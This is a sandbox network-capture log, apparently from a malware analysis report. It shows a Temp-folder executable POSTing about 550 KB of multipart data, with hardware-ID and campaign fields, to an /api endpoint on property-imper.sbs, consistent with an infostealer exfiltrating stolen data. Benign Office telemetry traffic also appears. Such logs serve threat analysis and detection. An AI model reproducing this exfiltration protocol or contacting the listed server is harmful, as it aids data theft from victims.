2024-11-22 19:36:50 UTC	1369	IN	Data Raw: 36 50 54 73 6f 6c 79 32 38 45 32 7a 6b 58 44 76 6e 32 6a 78 7a 78 61 68 33 47 74 69 45 4a 4f 64 39 67 41 51 7a 77 4b 32 37 72 66 73 31 50 53 47 62 4a 62 34 63 62 36 34 62 63 4f 7a 4a 65 43 65 4d 67 6c 59 75 6e 36 41 66 6f 32 37 45 47 33 44 45 72 76 54 36 73 33 6c 77 62 5a 51 79 2b 45 30 6a 67 51 56 77 37 73 51 38 4e 4d 75 65 45 43 69 57 35 55 62 6e 62 73 63 62 64 63 4b 74 2b 76 4f 7a 50 44 59 70 6b 69 79 2b 46 6d 79 67 46 33 72 76 78 6e 41 6c 6a 34 5a 52 49 35 47 71 46 61 49 69 67 46 31 30 33 2b 47 6a 74 59 6f 36 4b 44 71 44 4a 76 67 4b 4c 62 31 53 66 4f 79 43 4a 47 75 45 6c 56 6f 6c 6c 4b 41 52 6f 6d 48 42 47 6e 37 42 72 66 48 38 73 7a 38 78 4a 49 45 70 74 42 74 6b 71 68 35 31 37 63 68 2f 4a 73 58 4a 45 43 69 43 35 55 62 6e 54 73 6b 51 58 63 79 74 2f 4c Data Ascii: 6PTsoly28E2zkXDvn2jxzxah3GtiEJOd9gAQzwK27rfs1PSGbJb4cb64bcOzJeCeMglYun6Afo27EG3DErvT6s3lwbZQy+E0jgQVw7sQ8NMueECiW5UbnbscbdcKt+vOzPDYpkiy+FmygF3rvxnAlj4ZRI5GqFaIigF103+GjtYo6KDqDJvgKLb1SfOyCJGuElVollKARomHBGn7BrfH8sz8xJIEptBtkqh517ch/JsXJECiC5UbnTskQXcyt/L
2024-11-22 19:36:50 UTC	963	IN	Data Raw: 62 64 31 71 76 77 30 6a 2f 46 4a 4e 35 39 4a 73 4b 4d 65 32 52 69 79 4d 72 68 4f 72 49 74 46 54 61 6f 65 6d 39 37 58 6a 65 54 67 69 6d 69 6d 33 46 47 71 6f 48 33 37 70 78 33 30 74 67 59 31 61 4c 35 79 6a 48 36 4a 6f 7a 52 78 35 7a 71 62 7a 38 72 67 72 66 6d 50 54 4c 61 42 56 4f 2b 51 37 66 50 4c 4d 62 47 75 61 79 55 6c 76 6e 61 6c 65 2f 79 4c 4b 46 33 7a 44 70 76 66 7a 76 6a 38 7a 4c 4a 77 72 75 42 70 6e 72 78 74 39 34 63 39 35 4a 6f 47 56 57 69 53 56 71 52 65 72 62 34 35 54 4d 38 43 35 75 36 33 37 43 44 4d 6a 6e 53 32 75 56 58 7a 71 43 7a 76 6e 7a 6a 78 7a 78 59 5a 63 49 4a 6d 71 48 61 52 6a 78 41 39 68 79 36 6a 7a 38 4c 63 79 4d 43 75 42 4c 4c 63 63 59 4b 63 62 66 4f 6a 4f 64 69 69 43 78 78 35 76 6e 62 31 65 2f 79 4c 74 43 6d 50 4b 34 65 53 37 6f 6e 6b Data Ascii: bd1qvw0j/FJN59JsKMe2RiyMrhOrItFTaoem97XjeTgimim3FGqoH37px30tgY1aL5yjH6JozRx5zqbz8rgrfmPTLaBVO+Q7fPLMbGuayUlvnale/yLKF3zDpvfzvj8zLJwruBpnrxt94c95JoGVWiSVqRerb45TM8C5u637CDMjnS2uVXzqCzvnzjxzxYZcIJmqHaRjxA9hy6jz8LcyMCuBLLccYKcbfOjOdiiCxx5vnb1e/yLtCmPK4eS7onk
2024-11-22 19:36:50 UTC	1369	IN	Data Raw: 32 66 34 37 0d 0a 4a 65 6d 48 71 4a 77 7a 77 39 38 7a 4b 54 34 38 62 51 32 4d 69 57 5a 61 76 5a 56 5a 4c 78 53 49 36 44 75 66 7a 71 50 78 58 63 31 6a 4b 49 53 74 6d 6e 44 45 54 50 59 37 2b 4b 31 76 44 56 2b 64 64 4d 71 75 52 68 78 6f 52 4e 78 36 73 39 30 4a 49 43 43 58 79 75 65 72 68 43 31 62 4d 45 64 64 63 79 67 2f 76 61 77 4d 7a 41 6b 67 57 72 32 56 57 53 38 55 69 4f 67 36 47 63 71 69 49 73 53 41 5a 47 7a 47 65 56 44 77 42 5a 30 79 37 65 37 36 76 55 67 66 69 71 66 61 75 42 56 61 71 6f 65 65 4f 66 4b 64 43 36 46 6a 46 41 67 6b 4b 73 5a 74 57 6a 43 46 32 48 49 6f 76 62 78 74 6a 4d 37 4a 49 45 76 73 52 4d 6a 36 6c 4a 38 2b 49 49 6b 61 37 32 4d 58 68 32 5a 76 6c 36 34 4c 4e 64 64 64 4d 76 68 6f 37 57 34 50 6a 30 73 6d 53 4f 30 47 6d 53 67 41 48 48 6e 30 48 Data Ascii: 2f47JemHqJwzw98zKT48bQ2MiWZavZVZLxSI6DufzqPxXc1jKIStmnDETPY7+K1vDV+ddMquRhxoRNx6s90JICCXyuerhC1bMEddcyg/vawMzAkgWr2VWS8UiOg6GcqiIsSAZGzGeVDwBZ0y7e76vUgfiqfauBVaqoeeOfKdC6FjFAgkKsZtWjCF2HIovbxtjM7JIEvsRMj6lJ8+IIka72MXh2Zvl64LNdddMvho7W4Pj0smSO0GmSgAHHn0H
2024-11-22 19:36:50 UTC	1369	IN	Data Raw: 59 69 57 5a 71 51 69 71 62 59 34 43 50 64 37 68 2f 50 6e 37 59 58 34 2f 67 53 71 7a 46 57 53 71 41 48 72 6f 7a 58 59 72 67 34 78 61 4c 4a 4f 68 45 4b 35 6b 7a 78 42 79 78 71 48 2b 39 62 49 72 4d 32 33 64 61 72 38 4e 49 2f 78 53 54 4f 7a 4a 54 53 69 54 78 30 39 68 67 2b 55 5a 71 79 4b 57 58 58 4c 56 72 50 50 78 75 7a 51 34 4a 70 49 72 75 78 56 6a 70 78 4a 2b 36 38 31 36 4c 49 69 4e 57 53 61 49 72 52 71 31 59 73 49 5a 4d 34 6e 68 2f 4f 33 37 59 58 34 64 6b 43 47 30 46 57 36 78 55 6d 53 75 32 7a 77 73 69 63 63 49 62 35 4b 75 46 61 46 70 7a 52 35 39 7a 4b 76 30 2b 72 45 2f 4f 43 57 57 4b 72 51 56 5a 71 49 57 66 2b 37 46 63 69 61 45 6c 56 4d 6d 32 75 74 65 6f 48 71 4f 52 54 50 6e 71 75 33 77 76 43 39 38 47 4a 41 6b 74 68 4a 31 35 41 31 45 72 6f 4a 7a 4d 63 58 Data Ascii: YiWZqQiqbY4CPd7h/Pn7YX4/gSqzFWSqAHrozXYrg4xaLJOhEK5kzxByxqH+9bIrM23dar8NI/xSTOzJTSiTx09hg+UZqyKWXXLVrPPxuzQ4JpIruxVjpxJ+6816LIiNWSaIrRq1YsIZM4nh/O37YX4dkCG0FW6xUmSu2zwsiccIb5KuFaFpzR59zKv0+rE/OCWWKrQVZqIWf+7FciaElVMm2uteoHqORTPnqu3wvC98GJAkthJ15A1EroJzMcX
2024-11-22 19:36:50 UTC	1369	IN	Data Raw: 4b 4d 64 73 57 47 4a 49 30 33 6e 71 76 66 32 74 7a 67 35 62 64 31 71 74 31 55 37 6e 56 4a 34 38 74 41 7a 4f 70 4f 4b 51 43 6a 57 72 51 2b 71 62 6f 35 54 4d 34 75 6c 38 50 6d 2b 50 69 35 69 67 54 71 7a 47 58 58 6f 46 6d 6d 67 6a 44 77 36 6a 6f 68 43 49 5a 33 71 44 37 46 76 33 68 35 32 77 4f 33 7a 35 4c 59 31 66 6d 50 54 50 37 4d 5a 5a 61 6b 48 4e 50 48 55 66 7a 32 43 79 31 67 2b 6c 36 6c 65 6d 43 79 4f 42 54 4f 66 34 63 37 32 74 54 63 35 4f 34 4a 6e 6d 42 35 76 70 78 35 36 35 34 49 79 61 34 50 48 43 48 7a 55 35 52 71 32 49 70 5a 4e 49 5a 7a 30 71 4b 4c 72 61 79 46 6a 69 6d 71 75 56 54 76 32 58 44 76 79 67 69 52 72 77 6f 52 43 50 5a 79 6d 43 4b 51 6c 38 43 4e 79 79 71 36 33 2b 37 41 35 4f 54 32 46 4d 66 51 64 59 4c 34 49 52 64 37 70 63 43 32 43 6e 56 63 70 Data Ascii: KMdsWGJI03nqvf2tzg5bd1qt1U7nVJ48tAzOpOKQCjWrQ+qbo5TM4ul8Pm+Pi5igTqzGXXoFmmgjDw6johCIZ3qD7Fv3h52wO3z5LY1fmPTP7MZZakHNPHUfz2Cy1g+l6lemCyOBTOf4c72tTc5O4JnmB5vpx5654Iya4PHCHzU5Rq2IpZNIZz0qKLrayFjimquVTv2XDvygiRrwoRCPZymCKQl8CNyyq63+7A5OT2FMfQdYL4IRd7pcC2CnVcp
2024-11-22 19:36:50 UTC	1369	IN	Data Raw: 52 30 7a 56 30 39 68 37 6d 37 72 66 73 59 4e 44 32 65 4a 62 39 56 4c 65 51 57 4f 37 69 43 57 53 61 49 67 6c 34 6f 32 49 51 55 74 32 2f 42 47 6a 4f 4a 34 66 65 31 34 33 6b 2f 4a 34 4d 6e 74 78 49 76 6f 77 68 38 6f 49 77 38 4a 63 58 66 45 43 36 51 74 52 4f 6f 5a 59 49 62 66 63 6e 68 35 4c 75 69 65 53 68 74 79 33 6e 32 56 58 48 6b 53 6a 75 6e 7a 48 45 71 68 6f 6c 54 50 59 69 6a 48 62 46 68 69 53 4e 4e 34 71 7a 32 38 4c 55 2b 41 42 4f 79 49 4b 67 59 62 4b 4e 51 57 2b 66 55 66 78 57 37 73 45 45 6f 69 75 63 34 70 48 54 4e 58 54 32 48 75 62 75 74 2b 78 67 30 50 5a 34 6c 76 31 64 44 6f 77 52 34 6f 49 77 38 4c 38 58 66 45 41 71 58 71 42 75 70 5a 59 77 38 65 64 65 73 39 50 4c 35 47 54 6b 37 6b 47 72 32 56 57 2f 6b 53 6a 76 68 79 47 77 6d 69 6f 41 63 4b 49 43 69 58 Data Ascii: R0zV09h7m7rfsYND2eJb9VLeQWO7iCWSaIgl4o2IQUt2/BGjOJ4fe143k/J4MntxIvowh8oIw8JcXfEC6QtROoZYIbfcnh5LuieShty3n2VXHkSjunzHEqholTPYijHbFhiSNN4qz28LU+ABOyIKgYbKNQW+fUfxW7sEEoiuc4pHTNXT2Hubut+xg0PZ4lv1dDowR4oIw8L8XfEAqXqBupZYw8edes9PL5GTk7kGr2VW/kSjvhyGwmioAcKICiX

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
127	192.168.2.4	49902	172.67.162.84	443	6588	C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:50 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=TSO238E6APXQD0J1W User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 549846 Host: property-imper.sbs
2024-11-22 19:36:50 UTC	15331	OUT	Data Raw: 2d 2d 54 53 4f 32 33 38 45 36 41 50 58 51 44 30 4a 31 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 46 30 30 43 34 30 32 30 34 33 36 39 42 41 31 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 54 53 4f 32 33 38 45 36 41 50 58 51 44 30 4a 31 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 54 53 4f 32 33 38 45 36 41 50 58 51 44 30 4a 31 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 Data Ascii: --TSO238E6APXQD0J1WContent-Disposition: form-data; name="hwid"CF00C40204369BA1D7CBBD6DF28D3732--TSO238E6APXQD0J1WContent-Disposition: form-data; name="pid"1--TSO238E6APXQD0J1WContent-Disposition: form-data; name="lid"LOGS11--LiveTraf
2024-11-22 19:36:50 UTC	15331	OUT	Data Raw: e9 23 12 1b 8c fc 30 a4 28 4d 13 06 f3 34 15 e1 0d a1 f9 2f 9d c7 b5 ff ad ec 19 c1 9d c0 c9 5a 56 3c 43 19 a6 7b 9c 4a d5 4a f1 83 a4 36 7e ea 3a c6 c4 89 ee 65 1b 3f 30 f9 14 38 1e 4e 55 be 7f 1e 01 f5 86 28 0d 85 ef c6 0d 03 9e e4 98 58 ff 9f cb 08 fb 2a 80 26 2e e7 66 5b fc 65 c0 f6 49 3e 3a 8d ad 20 66 ba 40 f7 34 16 88 5d 51 87 95 f2 09 c9 21 be 05 67 9d 05 05 02 a4 89 eb 37 c6 4f c4 09 d0 e6 8b d5 a7 e2 ef 84 db 6d 44 04 1c 0b db cb 30 fa 43 c8 d6 d9 f9 20 ca 38 08 af 0f 4a 3a 82 fc 27 f3 20 38 1b aa 94 c2 1f 69 86 0b f7 03 07 ad 4e 40 ae e6 79 0b 22 d5 37 2e 2d 0a dc f8 b7 e5 e3 80 4b df 58 df bb b4 11 fb 21 a7 77 e8 50 cd fa 8d ab 54 a8 c0 be a2 c3 a4 e4 6a 62 88 eb 64 5a 14 0a ee dd ef 23 62 84 09 45 a6 9d 18 9a 96 83 01 49 fe f1 d4 5c 50 1c ec Data Ascii: #0(M4/ZV<C{JJ6~:e?08NU(X*&.f[eI>: f@4]Q!g7OmD0C 8J:' 8iN@y"7.-KX!wPTjbdZ#bEI\P
2024-11-22 19:36:50 UTC	15331	OUT	Data Raw: 9e df 64 08 ac b2 20 68 3f 30 21 1b 2a f8 26 7f 71 4c 3f 8a 09 b2 ed e6 60 c2 2a 5b c3 dc 79 2f e7 34 4b 21 e5 23 47 f2 c5 30 ef 31 cd d2 21 03 79 3e 56 72 52 97 96 5a 27 52 ea 25 ba 30 b5 5a 0a 6f 5b 83 f1 01 c3 b5 54 13 ee f7 8f e3 71 65 a3 93 d3 d3 d1 75 fa 13 4a ce 2a 60 a7 63 04 44 90 db 87 a7 5a 06 12 55 94 14 23 e2 7e bd 3f 71 4c 3e d2 c0 a9 cb 10 e7 77 5c 85 cf 8f 97 af d6 d5 c1 3d 6a 2c fb f5 2e 83 c0 7f 57 cd 7a 5a e0 55 09 0f 8f e6 e7 11 8f 45 f3 0b ad 29 f5 2d 09 ed 6c 92 d3 7e b5 51 fb 28 8e 20 87 12 da 83 33 79 a8 bb 24 5e a9 f2 4a 30 b5 e5 4e 68 ed 9e fc 49 b9 7e fe ef ea 59 93 57 46 7f 9f 8d be 9a 1e b2 8f ef 6e 90 68 1f b5 d9 f0 79 63 34 ec 2f fe 4b b1 76 2a 84 1f fd 93 d9 bd ee 74 c5 ef 51 a6 21 a2 33 4b 34 2b b7 45 56 68 7d 38 f6 d8 10 Data Ascii: d h?0!&qL?`[y/4K!#G01!y>VrRZ'R%0Zo[TqeuJ`cDZU#~?qL>w\=j,.WzZUE)-l~Q( 3y$^J0NhI~YWFnhyc4/KvtQ!3K4+EVh}8
2024-11-22 19:36:50 UTC	15331	OUT	Data Raw: d1 9e 5a 5a fb 0d 51 a6 51 f9 21 8d e7 42 82 c4 89 69 91 16 22 c3 1d d7 b9 8b 2a 40 e7 7c 72 15 77 6b 03 b7 dc f7 ea d8 ed 0d 94 34 a6 19 bd bc f5 2c 96 2a c6 2e bb b9 9b 1e 65 fd e9 d9 de 4f 68 98 51 b9 e4 72 60 e3 45 bf 40 4f 66 c5 e7 91 9a 8a 97 ff b0 98 dc fc d8 d3 d5 53 2b 7f 9c 98 d4 e6 73 42 5d 63 3f b7 7e 53 7d 8d dd 6d 5e 71 ae 7d da 9f 49 cd db 0b 1c 85 8b 00 e6 d6 69 e0 78 61 07 cf 4e 9d 5e d9 42 61 96 db b0 04 ab f4 40 1b 87 a3 8e 0f b7 f9 ba fe e8 5e 84 d5 84 dc 64 81 34 90 8d 09 b9 e5 35 0f d1 ed 42 ed 0d 3e a8 e3 67 7a df 90 db 4c 9e 86 5b 68 01 87 8f bf 36 10 1f 61 0a 3c e4 ff bf 23 d0 91 cc 51 08 94 a1 a1 26 03 70 ad 2c 17 11 59 12 91 9a a5 28 70 21 e4 a9 36 df 1a 5d 5c 15 fb ea 95 e2 90 d6 0f 40 d8 43 74 c4 3c c3 12 bf 4c ba 7a 70 03 8b Data Ascii: ZZQQ!Bi"@\|rwk4,.eOhQr`E@OfS+sB]c?~S}m^q}IixaN^Ba@^d45B>gzL[h6a<#Q&p,Y(p!6]\@Ct<Lzp
2024-11-22 19:36:50 UTC	15331	OUT	Data Raw: df 8a d8 e8 57 5b 36 11 99 65 98 4a 87 22 65 be 7f 88 c4 6c d9 08 62 8f 30 f8 35 4c ca 4d f6 19 ee 1b c8 79 55 52 f6 b9 7f 9a 28 07 51 96 c2 a4 9e 71 d0 ff 8b 0a 97 e9 cb f3 5e da f6 34 c2 3c 5f 46 be 76 01 4c 25 cc 09 79 35 bf c7 8c 65 24 9a da 13 ff 8d 44 a0 a9 a1 62 7b a4 b1 f3 28 4f b4 79 3b ca dc 49 e3 d7 65 fc 4b bf ad f7 20 ba e3 5c 00 ab 0f 41 62 19 01 4c df 74 ba cd 9a 99 dd 79 72 f5 04 e7 9a 01 1e 3f a5 1b fc 55 32 10 cb 83 11 c6 f4 2a 8c a3 19 51 45 dd 46 73 b2 1f ac 19 4d c6 d8 70 a1 46 79 2b f7 4c a7 a4 d1 91 f1 3b 33 43 15 f1 9b 2f 05 28 fc 9c 3b a3 c1 d8 7a 52 ed 75 26 33 e2 ef 41 72 9d 44 a4 71 1d 82 1d 08 93 28 47 5d 22 d2 fa d0 8c b8 72 f5 74 f8 1e df d2 53 3e 15 c9 64 4b fb 8c 04 9c 90 e0 7e 46 c9 9e 5d 3a 5c d2 77 59 d3 1b cf 24 22 0f Data Ascii: W[6eJ"elb05LMyUR(Qq^4<_FvL%y5e$Db{(Oy;IeK \AbLtyr?U2*QEFsMpFy+L;3C/(;zRu&3ArDq(G]"rtS>dK~F]:\wY$"
2024-11-22 19:36:50 UTC	15331	OUT	Data Raw: df ac 1f 56 c6 29 ee e3 3d ba a5 e3 7e 19 f5 4e 42 1c a9 ef 05 0f 5b e7 d1 b3 4f 53 cc 0c 07 26 8e c6 ec aa fe fb 7e 37 86 94 a4 66 2a c7 fd 48 d4 0d 26 c5 91 be 3d 8c 7a 7e 58 56 14 38 36 c9 0d 45 ea 7c fd b6 64 99 5e d1 d1 14 cf b9 22 2c fe e3 6f 6e 87 2b f6 0e 1c e4 0f 9d c0 84 fa a3 7e 2c e0 62 b3 ea 4c 68 e6 61 13 21 12 9c f9 27 81 95 5e ac 04 95 6b e3 60 d9 37 bd a2 30 7b b7 0c 6c 88 81 5f 72 b1 eb a3 44 07 db 5e 9d 25 56 d7 77 4b d8 5e 78 e1 c5 d3 ff 1d a6 b9 9e 81 bd c3 25 2d 42 7f 85 d8 89 aa 32 91 54 d8 66 ac 56 94 65 b7 ae 56 fb 0c 65 a8 fb 61 de eb 83 fb b3 cf 5c 40 df 5c 63 9c d9 99 29 72 15 ba 49 55 d7 5c 46 cf a2 97 73 66 6c 8e 92 e9 ac 25 55 da 18 00 6f d1 8c 79 56 1f 29 4d 04 10 f6 88 45 29 71 b3 1b b6 d7 06 ff 5d 97 1c a9 61 76 4e fd 4c Data Ascii: V)=~NB[OS&~7f*H&=z~XV86E\|d^",on+~,bLha!'^k`70{l_rD^%VwK^x%-B2TfVeVea\@\c)rIU\Fsfl%UoyV)ME)q]avNL
2024-11-22 19:36:50 UTC	15331	OUT	Data Raw: 1e 10 8b ff ce 43 ce 0f 5b cf 41 60 e4 80 d5 2b c2 f2 c0 05 ef 3f 98 31 05 37 57 96 42 2d 79 94 3c 86 6d fe df b5 63 ff 73 d4 ea f4 f6 f9 6f 37 aa 49 e9 ca 8a 7f da 45 1c 01 86 4d e1 10 76 14 17 35 39 e2 a3 f5 fc e3 58 bc cb 9d c0 6f 47 1e 2d 6d 65 7a 19 ef 13 d9 f0 72 14 50 a8 ee 79 e9 8d 29 1a be 8c c3 23 be ff 4e c7 8e 15 2f 98 93 f8 bf 6e b6 23 ea 80 b4 53 95 d1 cd 6c f3 54 df 27 0e ae fc 93 ba 23 d6 99 07 51 24 08 13 4a 7b ec 91 63 f3 b5 10 98 7d 16 0a 11 e5 b2 94 21 47 e1 de 93 1c ad 73 69 dc 7b 3d e8 98 3e bc cb 45 62 20 ef fd 48 8b b6 4d cd 5a d1 2c 0f b9 92 35 cd cc 11 ea 14 0d 77 91 2c 8e a8 3e 02 2c 46 33 35 50 df b1 bd 7f 69 c3 15 0d 57 71 90 5a 03 36 f6 6a 64 39 64 ed 68 2f 01 78 6a 9c 20 e2 50 08 9e 55 ec 9c 9d 25 32 c9 3a 3c f8 fd 0a a5 72 Data Ascii: C[A`+?17WB-y<mcso7IEMv59XoG-mezrPy)#N/n#SlT'#Q$J{c}!Gsi{=>Eb HMZ,5w,>,F35PiWqZ6jd9dh/xj PU%2:<r
2024-11-22 19:36:50 UTC	15331	OUT	Data Raw: c3 4c 3e af 6f 3b c3 21 35 c2 be 8f 59 56 02 13 ba 1a 82 6e d2 b0 8e ba 9a 16 57 ce 4e 22 1f 2d 6d ae e8 6d 7d b2 55 fb e6 97 05 21 25 41 c6 8a 6d c4 a3 83 c3 f9 8b 06 36 bd d9 c5 1d ed e8 b6 3f 86 82 41 e0 11 94 e1 b0 b7 f4 52 b1 5c ca 88 cb a9 4d 69 84 e7 b2 73 a6 71 13 fa 14 22 34 12 eb 85 54 a7 ae 66 a7 ee 7a 83 01 2e e7 d7 e5 58 f1 ce 78 f9 e0 ef be b0 36 be 38 e9 9b ef 50 fe b5 a9 0c 96 de 8e bd 2c 22 a3 09 dd 24 ab 88 60 2a f6 1a 24 6c 54 71 08 f7 72 4c f7 f7 8f 44 51 14 46 6f ad 92 2b 8f 73 f4 ea ab b9 29 ff 80 1e 45 48 c3 e8 98 d6 4a f5 b2 87 b5 25 4e 4c 64 58 7d 4a 08 e7 f6 f1 27 17 58 95 0e 4e 1d c9 3d 12 9a 7c e4 e4 f9 7f a7 cd 58 a4 75 d1 1d 76 44 c9 37 b6 d8 b6 59 b9 a8 95 9e d3 50 46 b6 4f e2 ce 8b 4b d3 86 a3 9f ec a0 cf 3c 4f e0 b3 58 30 Data Ascii: L>o;!5YVnWN"-mm}U!%Am6?AR\Misq"4Tfz.Xx68P,"$`*$lTqrLDQFo+s)EHJ%NLdX}J'XN=\|XuvD7YPFOK<OX0
2024-11-22 19:36:50 UTC	15331	OUT	Data Raw: 74 ce a9 b3 77 81 3b b6 e4 d2 09 8e 93 bf 96 39 fb 5a 9b 85 c1 22 1b 61 05 06 1e e2 4b b2 b3 69 3a 38 b2 49 6c ff ff 7f 62 c2 19 c0 69 3b fa 01 59 dc 39 d4 2e 43 54 87 7e e4 8f 77 be 5b 97 b5 e5 27 aa cd 09 9a 02 40 02 2b 95 ea 9e a7 46 58 d0 d3 33 42 1f bd db a0 3f 74 62 c0 37 fd 49 6b f7 e7 87 f9 66 82 bc 5b f3 f6 9f 8c a8 ff bb 25 26 08 42 7c 16 17 d1 40 1b 7f 05 07 de a2 0b 05 50 c3 64 b2 e4 3f c1 69 da 3e 89 9b c7 6a 2c 8d f9 7d 75 10 0c 18 70 82 9c 23 4b ed 45 d1 03 1c 0a 95 86 b9 92 87 fb a5 46 5c e3 b1 23 aa 74 01 8c 36 cb 33 9a 1a 0c f0 eb 8f 59 63 2b 80 4f c5 7c f0 b8 c8 9b ad b8 7d d3 56 68 5e 3b 1f 3e 33 67 aa e6 c4 a9 cd 67 15 a9 c6 bc 82 63 e2 f7 20 d8 a8 5b 7f fd 8a 83 04 ea 7a c2 04 04 6e 10 70 0d b8 7a e5 a8 90 dd 54 7e 00 e1 a0 15 e2 de Data Ascii: tw;9Z"aKi:8Ilbi;Y9.CT~w['@+FX3B?tb7Ikf[%&B\|@Pd?i>j,}up#KEF\#t63Yc+O\|}Vh^;>3ggc [znpzT~
2024-11-22 19:36:50 UTC	15331	OUT	Data Raw: 01 66 57 e5 7e 50 08 28 43 23 aa 9b 7b c6 31 e7 76 38 b9 11 25 97 9a e2 2d a2 11 6f 61 f1 4c 4b e1 4a b2 08 69 d7 fa 4d 23 ed 35 07 f5 4c be 48 e7 91 93 11 f4 97 37 25 27 4c 2d 3f 45 f3 6f f0 f9 10 d0 b5 d7 d1 84 33 fc d7 24 05 1d e7 f5 69 02 5f ed ff ef a5 37 d6 71 7a 27 33 21 3e 26 b1 6c a7 21 2f f3 ae 9a 97 20 e2 8d 59 f4 58 63 22 60 d8 1d 05 f9 87 67 54 a0 fc 5f 66 4c 77 87 e1 8b 57 bf 88 56 ee bc 59 cc d6 40 40 e4 17 d7 d4 d3 de ac ab f9 e1 8c 84 fc a5 9a 09 97 29 78 a2 b6 89 54 81 56 17 b0 6c dd 11 7a 14 86 61 6a 50 8c 5a a1 29 ce db fd fa 72 91 4a ca 04 80 9d 1c bd e3 fc 8d 21 df d9 81 9e 1e d2 07 5c e7 0f 8c d6 84 f7 dc 16 70 0c 5a 78 35 6f af 42 6c a1 67 79 0c 56 ca 0d 96 dc 75 c9 17 5b 18 08 93 8a f4 6e 56 ee 18 5b 2a d6 a6 47 51 eb 66 3d f2 42 Data Ascii: fW~P(C#{1v8%-oaLKJiM#5LH7%'L-?Eo3$i_7qz'3!>&l!/ YXc"`gT_fLwWVY@@)xTVlzajPZ)rJ!\pZx5oBlgyVu[nV[*GQf=B
2024-11-22 19:36:56 UTC	1023	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=2octebnq7aoalcup6aph0c79jn; expires=Tue, 18-Mar-2025 13:23:30 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VuIzENqbVFLaa1Wfnq%2FYpgbu3gkyR%2FhYtWiuF02iadpAly4gbgug3pxHmUTZ%2Bln%2Bja6OWqKghMq8pmyF4NVgqaIlgsX5zdpNSkUSIHFTq0fUUSbBbtR24Mgg3HhbwG5%2FLMBpHkM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e6b5ee1af638cca-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1835&sent=293&recv=573&lost=0&retrans=1&sent_bytes=4230&recv_bytes=552328&delivery_rate=63862&cwnd=236&unsent_bytes=0&cid=a5eb595b26a15c0a&ts=6593&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port
128	192.168.2.4	49899	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:50 UTC	192	OUT	GET /rules/rule703500v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:50 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:50 GMT Content-Type: text/xml Content-Length: 1362 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT ETag: "0x8DC582BDF497570" x-ms-request-id: cb4d723f-a01e-003d-7157-3c98d7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193650Z-15b8b599d882hxlwhC1TEBfa5w00000001qg00000000hzfe x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:50 UTC	1362	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
129	192.168.2.4	49901	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
